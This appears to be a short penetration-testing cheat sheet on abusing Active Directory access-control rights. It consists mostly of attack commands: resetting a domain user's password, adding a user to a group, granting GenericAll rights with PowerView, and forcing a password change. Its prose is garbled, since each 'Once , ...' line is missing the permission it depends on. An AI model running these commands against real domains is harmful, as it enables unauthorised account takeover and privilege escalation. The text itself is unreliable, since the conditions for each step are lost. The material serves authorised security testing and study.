ACLs/ACEs
Last updated
Last updated
Once , we can change it's password:
net user vulnuser Password123! /domain
Once, we can add ourselfs to it:
net group testgroup user /add /domain
Once , we can add the GenericAll access right to it:
Add-DomainObjectAcl -TargetIdentity vulnuser -PrincipalIdentity {our user} -Rights All
Once , we must load within a session of the user who has rights or ir part of the group that has those rigths and execute the following command:
Set-DomainUserPassword -Identity Vulnuser -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose